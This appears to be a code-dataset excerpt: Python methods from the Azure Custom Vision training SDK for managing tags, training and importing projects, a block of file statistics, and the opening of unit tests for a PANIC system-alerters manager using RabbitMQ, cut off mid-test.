    # Resolve the templated URL for this operation.
    path_args = {
        'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        'projectId': self._serialize.url("project_id", project_id, 'str')
    }
    url = self._client.format_url(self.get_tags.metadata['url'], **path_args)

    # Optional query parameters.
    query_parameters = {}
    if iteration_id is not None:
        query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')

    # Headers, with caller-supplied overrides applied last.
    header_parameters = {'Accept': 'application/json'}
    if custom_headers:
        header_parameters.update(custom_headers)

    # Issue the GET request.
    request = self._client.get(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('[Tag]', response) if response.status_code == 200 else None

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get_tags.metadata = {'url': '/projects/{projectId}/tags'}
def create_tag(
        self, project_id, name, description=None, type=None, custom_headers=None, raw=False, **operation_config):
    """Create a tag for the project.

    :param project_id: The project id.
    :type project_id: str
    :param name: The tag name.
    :type name: str
    :param description: Optional description for the tag.
    :type description: str
    :param type: Optional type for the tag. Possible values include:
     'Regular', 'Negative'
    :type type: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: Tag or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.Tag or
     ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Resolve the templated URL for this operation.
    path_args = {
        'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        'projectId': self._serialize.url("project_id", project_id, 'str')
    }
    url = self._client.format_url(self.create_tag.metadata['url'], **path_args)

    # 'name' is required; 'description' and 'type' are optional.
    # NOTE: 'type' shadows the builtin but is part of the public signature.
    query_parameters = {'name': self._serialize.query("name", name, 'str')}
    if description is not None:
        query_parameters['description'] = self._serialize.query("description", description, 'str')
    if type is not None:
        query_parameters['type'] = self._serialize.query("type", type, 'str')

    # Headers, with caller-supplied overrides applied last.
    header_parameters = {'Accept': 'application/json'}
    if custom_headers:
        header_parameters.update(custom_headers)

    # Issue the POST request (all inputs travel as query parameters).
    request = self._client.post(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('Tag', response) if response.status_code == 200 else None

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
create_tag.metadata = {'url': '/projects/{projectId}/tags'}
def get_tag(
        self, project_id, tag_id, iteration_id=None, custom_headers=None, raw=False, **operation_config):
    """Get information about a specific tag.

    :param project_id: The project this tag belongs to.
    :type project_id: str
    :param tag_id: The tag id.
    :type tag_id: str
    :param iteration_id: The iteration to retrieve this tag from.
     Optional, defaults to current training set.
    :type iteration_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: Tag or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.Tag or
     ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Resolve the templated URL for this operation.
    path_args = {
        'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        'projectId': self._serialize.url("project_id", project_id, 'str'),
        'tagId': self._serialize.url("tag_id", tag_id, 'str')
    }
    url = self._client.format_url(self.get_tag.metadata['url'], **path_args)

    # Optional query parameters.
    query_parameters = {}
    if iteration_id is not None:
        query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')

    # Headers, with caller-supplied overrides applied last.
    header_parameters = {'Accept': 'application/json'}
    if custom_headers:
        header_parameters.update(custom_headers)

    # Issue the GET request.
    request = self._client.get(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('Tag', response) if response.status_code == 200 else None

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get_tag.metadata = {'url': '/projects/{projectId}/tags/{tagId}'}
def delete_tag(
        self, project_id, tag_id, custom_headers=None, raw=False, **operation_config):
    """Delete a tag from the project.

    :param project_id: The project id.
    :type project_id: str
    :param tag_id: Id of the tag to be deleted.
    :type tag_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: None or ClientRawResponse if raw=true
    :rtype: None or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Resolve the templated URL for this operation.
    path_args = {
        'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        'projectId': self._serialize.url("project_id", project_id, 'str'),
        'tagId': self._serialize.url("tag_id", tag_id, 'str')
    }
    url = self._client.format_url(self.delete_tag.metadata['url'], **path_args)

    # No query parameters; only caller-supplied headers (if any).
    query_parameters = {}
    header_parameters = dict(custom_headers) if custom_headers else {}

    # Issue the DELETE request; success is 204 No Content.
    request = self._client.delete(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [204]:
        raise models.CustomVisionErrorException(self._deserialize, response)

    if raw:
        return ClientRawResponse(None, response)
delete_tag.metadata = {'url': '/projects/{projectId}/tags/{tagId}'}
def update_tag(
        self, project_id, tag_id, updated_tag, custom_headers=None, raw=False, **operation_config):
    """Update a tag.

    :param project_id: The project id.
    :type project_id: str
    :param tag_id: The id of the target tag.
    :type tag_id: str
    :param updated_tag: The updated tag model.
    :type updated_tag:
     ~azure.cognitiveservices.vision.customvision.training.models.Tag
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: Tag or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.Tag or
     ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Resolve the templated URL for this operation.
    path_args = {
        'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        'projectId': self._serialize.url("project_id", project_id, 'str'),
        'tagId': self._serialize.url("tag_id", tag_id, 'str')
    }
    url = self._client.format_url(self.update_tag.metadata['url'], **path_args)

    # No query parameters for this operation.
    query_parameters = {}

    # Headers, with caller-supplied overrides applied last.
    header_parameters = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if custom_headers:
        header_parameters.update(custom_headers)

    # Serialize the updated model and PATCH it.
    body_content = self._serialize.body(updated_tag, 'Tag')
    request = self._client.patch(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('Tag', response) if response.status_code == 200 else None

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
update_tag.metadata = {'url': '/projects/{projectId}/tags/{tagId}'}
def suggest_tags_and_regions(
        self, project_id, iteration_id, image_ids, custom_headers=None, raw=False, **operation_config):
    """Suggest tags and regions for an array/batch of untagged images.

    Returns suggested tags and regions, with confidences, for up to 64
    untagged images; an empty array is returned when no tags are found.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: IterationId to use for tag and region suggestion.
    :type iteration_id: str
    :param image_ids: Array of image ids tag suggestion are needed for.
     Use GetUntaggedImages API to get imageIds.
    :type image_ids: list[str]
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: list or ClientRawResponse if raw=true
    :rtype:
     list[~azure.cognitiveservices.vision.customvision.training.models.SuggestedTagAndRegion]
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Resolve the templated URL for this operation.
    path_args = {
        'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        'projectId': self._serialize.url("project_id", project_id, 'str')
    }
    url = self._client.format_url(
        self.suggest_tags_and_regions.metadata['url'], **path_args)

    # Both parameters are required; imageIds is a comma-joined list capped at 64.
    query_parameters = {
        'iterationId': self._serialize.query("iteration_id", iteration_id, 'str'),
        'imageIds': self._serialize.query("image_ids", image_ids, '[str]', div=',', max_items=64, min_items=0),
    }

    # Headers, with caller-supplied overrides applied last.
    header_parameters = {'Accept': 'application/json'}
    if custom_headers:
        header_parameters.update(custom_headers)

    # Issue the POST request.
    request = self._client.post(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('[SuggestedTagAndRegion]', response) if response.status_code == 200 else None

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
suggest_tags_and_regions.metadata = {'url': '/projects/{projectId}/tagsandregions/suggestions'}
def train_project(
        self, project_id, training_type=None, reserved_budget_in_hours=0, force_train=False, notification_email_address=None, selected_tags=None, custom_headers=None, raw=False, **operation_config):
    """Queues project for training.

    :param project_id: The project id.
    :type project_id: str
    :param training_type: The type of training to use to train the project
     (default: Regular). Possible values include: 'Regular', 'Advanced'
    :type training_type: str
    :param reserved_budget_in_hours: The number of hours reserved as
     budget for training (if applicable).
    :type reserved_budget_in_hours: int
    :param force_train: Whether to force train even if dataset and
     configuration does not change (default: false).
    :type force_train: bool
    :param notification_email_address: The email address to send
     notification to when training finishes (default: null).
    :type notification_email_address: str
    :param selected_tags: List of tags selected for this training session,
     other tags in the project will be ignored.
    :type selected_tags: list[str]
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: Iteration or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.Iteration
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Only build a TrainingParameters body when tags were explicitly chosen.
    training_parameters = None
    if selected_tags is not None:
        training_parameters = models.TrainingParameters(selected_tags=selected_tags)

    # Resolve the templated URL for this operation.
    path_args = {
        'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        'projectId': self._serialize.url("project_id", project_id, 'str')
    }
    url = self._client.format_url(self.train_project.metadata['url'], **path_args)

    # Optional query parameters.
    query_parameters = {}
    if training_type is not None:
        query_parameters['trainingType'] = self._serialize.query("training_type", training_type, 'str')
    if reserved_budget_in_hours is not None:
        query_parameters['reservedBudgetInHours'] = self._serialize.query("reserved_budget_in_hours", reserved_budget_in_hours, 'int')
    if force_train is not None:
        query_parameters['forceTrain'] = self._serialize.query("force_train", force_train, 'bool')
    if notification_email_address is not None:
        query_parameters['notificationEmailAddress'] = self._serialize.query("notification_email_address", notification_email_address, 'str')

    # Headers, with caller-supplied overrides applied last.
    header_parameters = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if custom_headers:
        header_parameters.update(custom_headers)

    # Serialize the body (or send an empty one) and POST the request.
    if training_parameters is not None:
        body_content = self._serialize.body(training_parameters, 'TrainingParameters')
    else:
        body_content = None
    request = self._client.post(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('Iteration', response) if response.status_code == 200 else None

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
train_project.metadata = {'url': '/projects/{projectId}/train'}
def import_project(
        self, token, custom_headers=None, raw=False, **operation_config):
    """Imports a project.

    :param token: Token generated from the export project call.
    :type token: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: Project or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.Project
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Resolve the templated URL (no projectId: this creates a new project).
    path_args = {
        'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True)
    }
    url = self._client.format_url(self.import_project.metadata['url'], **path_args)

    # The export token is the single required query parameter.
    query_parameters = {'token': self._serialize.query("token", token, 'str')}

    # Headers, with caller-supplied overrides applied last.
    header_parameters = {'Accept': 'application/json'}
    if custom_headers:
        header_parameters.update(custom_headers)

    # Issue the POST request.
    request = self._client.post(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('Project', response) if response.status_code == 200 else None

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
import_project.metadata = {'url': '/projects/import'}
| 44.719463
| 202
| 0.670256
| 14,326
| 133,264
| 6.057029
| 0.029387
| 0.026137
| 0.019545
| 0.024339
| 0.90693
| 0.891452
| 0.872737
| 0.860602
| 0.848962
| 0.838567
| 0
| 0.00406
| 0.240433
| 133,264
| 2,979
| 203
| 44.734475
| 0.853186
| 0.358274
| 0
| 0.764973
| 0
| 0
| 0.106029
| 0.02545
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036391
| false
| 0
| 0.003791
| 0
| 0.107657
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9d4e0c96972757314d478f7d31952ce3953c042
| 81,450
|
py
|
Python
|
alerter/test/alerter/managers/test_system.py
|
SimplyVC/panic
|
2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d
|
[
"Apache-2.0"
] | 41
|
2019-08-23T12:40:42.000Z
|
2022-03-28T11:06:02.000Z
|
alerter/test/alerter/managers/test_system.py
|
SimplyVC/panic
|
2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d
|
[
"Apache-2.0"
] | 147
|
2019-08-30T22:09:48.000Z
|
2022-03-30T08:46:26.000Z
|
alerter/test/alerter/managers/test_system.py
|
SimplyVC/panic
|
2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d
|
[
"Apache-2.0"
] | 3
|
2019-09-03T21:12:28.000Z
|
2021-08-18T14:27:56.000Z
|
import copy
import json
import logging
import multiprocessing
import time
import unittest
from datetime import timedelta, datetime
from multiprocessing import Process
from unittest import mock
from unittest.mock import call
import pika
import pika.exceptions
from freezegun import freeze_time
from src.alerter.alerter_starters import start_system_alerter
from src.alerter.alerters.system import SystemAlerter
from src.alerter.alerts.internal_alerts import ComponentResetAlert
from src.alerter.managers.system import SystemAlertersManager
from src.configs.alerts.system import SystemAlertsConfig
from src.message_broker.rabbitmq import RabbitMQApi
from src.utils import env
from src.utils.constants.names import SYSTEM_ALERTER_NAME_TEMPLATE
from src.utils.constants.rabbitmq import (
HEALTH_CHECK_EXCHANGE, CONFIG_EXCHANGE,
SYS_ALERTERS_MANAGER_CONFIGS_QUEUE_NAME,
SYS_ALERTERS_MAN_HEARTBEAT_QUEUE_NAME, PING_ROUTING_KEY,
ALERTS_CONFIGS_ROUTING_KEY_GEN,
HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY, SYSTEM_ALERT_ROUTING_KEY,
ALERT_EXCHANGE, TOPIC)
from src.utils.exceptions import PANICException, MessageWasNotDeliveredException
from test.utils.utils import infinite_fn
# Tests adapted from Monitors managers
class TestSystemAlertersManager(unittest.TestCase):
    def setUp(self) -> None:
        """Build the manager under test plus the dummy processes, alerts
        configs and RabbitMQ handles shared by all tests in this class."""
        # Disabled logger so fixture code stays silent during test runs.
        self.dummy_logger = logging.getLogger('Dummy')
        self.dummy_logger.disabled = True
        # Zero interval so connection checks never delay the tests.
        self.connection_check_time_interval = timedelta(seconds=0)
        self.rabbitmq = RabbitMQApi(
            self.dummy_logger, env.RABBIT_IP,
            connection_check_time_interval=self.connection_check_time_interval)
        self.manager_name = 'test_system_alerters_manager'
        self.test_queue_name = 'Test Queue'
        self.test_data_str = 'test data'
        # Three parent ids / chains; the third pair is spare for tests that
        # need a config not present in the example process dict below.
        self.parent_id_1 = 'test_parent_id_1'
        self.parent_id_2 = 'test_parent_id_2'
        self.parent_id_3 = 'test_parent_id_3'
        self.chain_1 = 'Substrate Polkadot'
        self.chain_2 = 'general'
        self.chain_3 = 'Cosmos'
        self.test_heartbeat = {
            'component_name': 'Test Component',
            'is_alive': True,
            'timestamp': datetime(2012, 1, 1, 1).timestamp(),
        }
        # Daemonized no-op processes standing in for real alerter processes.
        self.dummy_process1 = Process(target=infinite_fn, args=())
        self.dummy_process1.daemon = True
        self.dummy_process2 = Process(target=infinite_fn, args=())
        self.dummy_process2.daemon = True
        self.dummy_process3 = Process(target=infinite_fn, args=())
        self.dummy_process3.daemon = True
        # Maps parent_id -> alerter bookkeeping, keyed the way the manager
        # stores its config_process_dict.
        self.config_process_dict_example = {
            self.parent_id_1: {
                "component_name": SYSTEM_ALERTER_NAME_TEMPLATE.format(
                    self.chain_1),
                "process": self.dummy_process1,
                "chain": self.chain_1
            },
            self.parent_id_2: {
                "component_name": SYSTEM_ALERTER_NAME_TEMPLATE.format(
                    self.chain_2),
                "process": self.dummy_process2,
                "chain": self.chain_2
            }
        }
        # Same shape as config_process_dict_example; used as the expected
        # value in assertions.
        self.expected_output = {
            self.parent_id_1: {
                "component_name": SYSTEM_ALERTER_NAME_TEMPLATE.format(
                    self.chain_1),
                "process": self.dummy_process1,
                "chain": self.chain_1
            },
            self.parent_id_2: {
                "component_name": SYSTEM_ALERTER_NAME_TEMPLATE.format(
                    self.chain_2),
                "process": self.dummy_process2,
                "chain": self.chain_2
            }
        }
        """
        ############# Alerts config base configuration ######################
        """
        # Threshold/enabled values shared by every per-metric config below.
        self.enabled_alert = "True"
        self.critical_threshold_percentage = 95
        self.critical_threshold_seconds = 300
        self.critical_repeat_seconds = 300
        self.critical_enabled = "True"
        self.warning_threshold_percentage = 85
        self.warning_threshold_seconds = 200
        self.warning_enabled = "True"
        # ALERTS CONFIG PARENT_1
        self.base_config = {
            "name": "base_percent_config",
            "enabled": self.enabled_alert,
            "parent_id": self.parent_id_1,
            "critical_threshold": self.critical_threshold_percentage,
            "critical_repeat": self.critical_repeat_seconds,
            "critical_enabled": self.critical_enabled,
            "warning_threshold": self.warning_threshold_percentage,
            "warning_enabled": self.warning_enabled
        }
        # Each metric config is a deep copy of the base with its own name;
        # system_is_down uses second-based thresholds instead of percentages.
        self.open_file_descriptors = copy.deepcopy(self.base_config)
        self.open_file_descriptors['name'] = "open_file_descriptors"
        self.system_cpu_usage = copy.deepcopy(self.base_config)
        self.system_cpu_usage['name'] = "system_cpu_usage"
        self.system_storage_usage = copy.deepcopy(self.base_config)
        self.system_storage_usage['name'] = "system_storage_usage"
        self.system_ram_usage = copy.deepcopy(self.base_config)
        self.system_ram_usage['name'] = "system_ram_usage"
        self.system_is_down = copy.deepcopy(self.base_config)
        self.system_is_down['name'] = "system_is_down"
        self.system_is_down['critical_threshold'] = \
            self.critical_threshold_seconds
        self.system_is_down['warning_threshold'] = \
            self.warning_threshold_seconds
        # Variants of the config payload as it could arrive over RabbitMQ:
        # plain, with a DEFAULT section, and with metric keys missing.
        self.sent_configs_example = {
            1: self.open_file_descriptors,
            2: self.system_cpu_usage,
            3: self.system_storage_usage,
            4: self.system_ram_usage,
            5: self.system_is_down
        }
        self.sent_configs_example_with_default = {
            "DEFAULT": {},
            "1": self.open_file_descriptors,
            "2": self.system_cpu_usage,
            "3": self.system_storage_usage,
            "4": self.system_ram_usage,
            "5": self.system_is_down
        }
        self.sent_configs_example_with_missing_keys = {
            "DEFAULT": {},
            "1": self.open_file_descriptors,
            "2": self.system_cpu_usage,
            "4": self.system_ram_usage,
            "5": self.system_is_down
        }
        # ALERTS CONFIG PARENT_2
        self.base_config_2 = {
            "name": "base_percent_config",
            "enabled": self.enabled_alert,
            "parent_id": self.parent_id_2,
            "critical_threshold": self.critical_threshold_percentage,
            "critical_repeat": self.critical_repeat_seconds,
            "critical_enabled": self.critical_enabled,
            "warning_threshold": self.warning_threshold_percentage,
            "warning_enabled": self.warning_enabled
        }
        self.open_file_descriptors_2 = copy.deepcopy(self.base_config_2)
        self.open_file_descriptors_2['name'] = "open_file_descriptors"
        self.system_cpu_usage_2 = copy.deepcopy(self.base_config_2)
        self.system_cpu_usage_2['name'] = "system_cpu_usage"
        self.system_storage_usage_2 = copy.deepcopy(self.base_config_2)
        self.system_storage_usage_2['name'] = "system_storage_usage"
        self.system_ram_usage_2 = copy.deepcopy(self.base_config_2)
        self.system_ram_usage_2['name'] = "system_ram_usage"
        self.system_is_down_2 = copy.deepcopy(self.base_config_2)
        self.system_is_down_2['name'] = "system_is_down"
        self.system_is_down_2['critical_threshold'] = \
            self.critical_threshold_seconds
        self.system_is_down_2['warning_threshold'] = \
            self.warning_threshold_seconds
        self.sent_configs_example_with_default_2 = {
            "DEFAULT": {},
            "1": self.open_file_descriptors_2,
            "2": self.system_cpu_usage_2,
            "3": self.system_storage_usage_2,
            "4": self.system_ram_usage_2,
            "5": self.system_is_down_2
        }
        self.sent_configs_example_with_default_2_missing_keys = {
            "DEFAULT": {},
            "1": self.open_file_descriptors_2,
            "2": self.system_cpu_usage_2,
            "4": self.system_ram_usage_2,
            "5": self.system_is_down_2
        }
        # Fully-built config objects matching the dict payloads above.
        self.system_alerts_config = SystemAlertsConfig(
            self.parent_id_1,
            self.open_file_descriptors,
            self.system_cpu_usage,
            self.system_storage_usage,
            self.system_ram_usage,
            self.system_is_down
        )
        self.system_alerts_config_2 = SystemAlertsConfig(
            self.parent_id_2,
            self.open_file_descriptors_2,
            self.system_cpu_usage_2,
            self.system_storage_usage_2,
            self.system_ram_usage_2,
            self.system_is_down_2
        )
        # The object under test.
        self.test_manager = SystemAlertersManager(
            self.dummy_logger, self.manager_name, self.rabbitmq)
        self.empty_message = {
            "DEFAULT": {}
        }
        self.chain_example_new = 'Substrate Polkadot'
        self.chains_routing_key = 'chains.Substrate.Polkadot.alerts_config'
        self.general_routing_key = ALERTS_CONFIGS_ROUTING_KEY_GEN
        self.test_exception = PANICException('test_exception', 1)
        self.systems_alerts_configs = {}
    def tearDown(self) -> None:
        """Tear down RabbitMQ state and drop fixture references.

        Best-effort cleanup: failures are printed, not raised, so one test's
        broken broker state cannot cascade into later tests.
        """
        # Delete any queues and exchanges which are common across many tests
        try:
            self.test_manager.rabbitmq.connect()
            # Re-declare exchanges so the deletes below cannot fail on
            # missing entities.
            self.test_manager.rabbitmq.exchange_declare(
                HEALTH_CHECK_EXCHANGE, TOPIC, False, True, False, False)
            self.test_manager.rabbitmq.exchange_declare(
                ALERT_EXCHANGE, TOPIC, False, True, False, False)
            self.test_manager.rabbitmq.exchange_declare(
                CONFIG_EXCHANGE, TOPIC, False, True, False, False)
            # Declare queues incase they haven't been declared already
            self.test_manager.rabbitmq.queue_declare(
                queue=self.test_queue_name, durable=True, exclusive=False,
                auto_delete=False, passive=False
            )
            self.test_manager.rabbitmq.queue_declare(
                queue=SYS_ALERTERS_MAN_HEARTBEAT_QUEUE_NAME, durable=True,
                exclusive=False, auto_delete=False, passive=False
            )
            self.test_manager.rabbitmq.queue_declare(
                queue=SYS_ALERTERS_MANAGER_CONFIGS_QUEUE_NAME, durable=True,
                exclusive=False, auto_delete=False, passive=False
            )
            # Purge before deleting so no stale messages survive.
            self.test_manager.rabbitmq.queue_purge(self.test_queue_name)
            self.test_manager.rabbitmq.queue_purge(
                SYS_ALERTERS_MAN_HEARTBEAT_QUEUE_NAME)
            self.test_manager.rabbitmq.queue_purge(
                SYS_ALERTERS_MANAGER_CONFIGS_QUEUE_NAME)
            self.test_manager.rabbitmq.queue_delete(self.test_queue_name)
            self.test_manager.rabbitmq.queue_delete(
                SYS_ALERTERS_MAN_HEARTBEAT_QUEUE_NAME)
            self.test_manager.rabbitmq.queue_delete(
                SYS_ALERTERS_MANAGER_CONFIGS_QUEUE_NAME)
            self.test_manager.rabbitmq.exchange_delete(HEALTH_CHECK_EXCHANGE)
            self.test_manager.rabbitmq.exchange_delete(ALERT_EXCHANGE)
            self.test_manager.rabbitmq.exchange_delete(CONFIG_EXCHANGE)
            self.test_manager.rabbitmq.disconnect()
        except Exception as e:
            print("Test failed: {}".format(e))
        # Drop references so fixtures cannot leak between tests.
        self.dummy_logger = None
        self.rabbitmq = None
        self.test_manager = None
        self.test_exception = None
        self.system_alerts_config = None
        self.base_config = None
        self.open_file_descriptors = None
        self.system_cpu_usage = None
        self.system_storage_usage = None
        self.system_ram_usage = None
        self.system_is_down = None
        self.systems_alerts_configs = None
        self.dummy_process1 = None
        self.dummy_process2 = None
        self.dummy_process3 = None
def test_str_returns_manager_name(self) -> None:
self.assertEqual(self.manager_name, self.test_manager.__str__())
def test_name_returns_manager_name(self) -> None:
self.assertEqual(self.manager_name, self.test_manager.name)
def test_systems_configs_returns_systems_configs(self) -> None:
self.test_manager._systems_alerts_configs[self.parent_id_1] = \
self.system_alerts_config
self.assertEqual(self.system_alerts_config,
self.test_manager.systems_alerts_configs[
self.parent_id_1])
@mock.patch.object(RabbitMQApi, "start_consuming")
def test_listen_for_data_calls_start_consuming(
self, mock_start_consuming) -> None:
mock_start_consuming.return_value = None
self.test_manager._listen_for_data()
mock_start_consuming.assert_called_once()
    @mock.patch.object(SystemAlertersManager, "_process_ping")
    def test_initialise_rabbitmq_initialises_everything_as_expected(
            self, mock_process_ping) -> None:
        """Check that `_initialise_rabbitmq` opens the connection, enables
        delivery confirmation, declares the exchanges and queues, and starts
        consuming.

        Verification strategy: publish with the queues' routing keys and then
        confirm each queue is empty, which shows `basic_consume` captured the
        messages immediately.
        """
        mock_process_ping.return_value = None
        try:
            # To make sure that there is no connection/channel already
            # established
            self.assertIsNone(self.rabbitmq.connection)
            self.assertIsNone(self.rabbitmq.channel)
            # To make sure that the exchanges and queues have not already been
            # declared
            self.test_manager.rabbitmq.connect()
            self.test_manager._initialise_rabbitmq()
            # Perform checks that the connection has been opened, marked as open
            # and that the delivery confirmation variable is set.
            self.assertTrue(self.test_manager.rabbitmq.is_connected)
            self.assertTrue(self.test_manager.rabbitmq.connection.is_open)
            self.assertTrue(
                self.test_manager.rabbitmq.channel._delivery_confirmation)
            # Check whether the exchanges and queues have been created by
            # sending messages with the same routing keys as for the queues. We
            # will also check if the size of the queues is 0 to confirm that
            # basic_consume was called (it will store the msg in the component
            # memory immediately). If one of the exchanges or queues is not
            # created, then an exception will be thrown. Note when deleting the
            # exchanges in the beginning we also released every binding, hence
            # there is no other queue binded with the same routing key to any
            # exchange at this point.
            self.test_manager.rabbitmq.basic_publish_confirm(
                exchange=HEALTH_CHECK_EXCHANGE,
                routing_key=PING_ROUTING_KEY, body=self.test_data_str,
                is_body_dict=False,
                properties=pika.BasicProperties(delivery_mode=2),
                mandatory=True)
            self.test_manager.rabbitmq.basic_publish_confirm(
                exchange=CONFIG_EXCHANGE,
                routing_key=self.chains_routing_key,
                body=self.test_data_str, is_body_dict=False,
                properties=pika.BasicProperties(delivery_mode=2),
                mandatory=True)
            self.test_manager.rabbitmq.basic_publish_confirm(
                exchange=CONFIG_EXCHANGE,
                routing_key=ALERTS_CONFIGS_ROUTING_KEY_GEN,
                body=self.test_data_str, is_body_dict=False,
                properties=pika.BasicProperties(delivery_mode=2),
                mandatory=True)
            # NOTE(review): mandatory=False here, unlike the publishes above —
            # presumably no queue is bound on this routing key so an unroutable
            # message must not fail the test; confirm against the manager.
            self.test_manager.rabbitmq.basic_publish_confirm(
                exchange=ALERT_EXCHANGE, routing_key=SYSTEM_ALERT_ROUTING_KEY,
                body=self.test_data_str, is_body_dict=False,
                properties=pika.BasicProperties(delivery_mode=2),
                mandatory=False
            )
            # Re-declare queue to get the number of messages
            res = self.test_manager.rabbitmq.queue_declare(
                SYS_ALERTERS_MAN_HEARTBEAT_QUEUE_NAME, False, True, False,
                False)
            self.assertEqual(0, res.method.message_count)
            res = self.test_manager.rabbitmq.queue_declare(
                SYS_ALERTERS_MANAGER_CONFIGS_QUEUE_NAME, False, True, False,
                False)
            self.assertEqual(0, res.method.message_count)
        except Exception as e:
            self.fail("Test failed: {}".format(e))
    def test_send_heartbeat_sends_a_heartbeat_correctly(self) -> None:
        """`_send_heartbeat` must publish the heartbeat dict on the
        health-check exchange with the heartbeat-output routing key.
        """
        # This test creates a queue which receives messages with the same
        # routing key as the ones sent by send_heartbeat, and checks that the
        # heartbeat is received
        try:
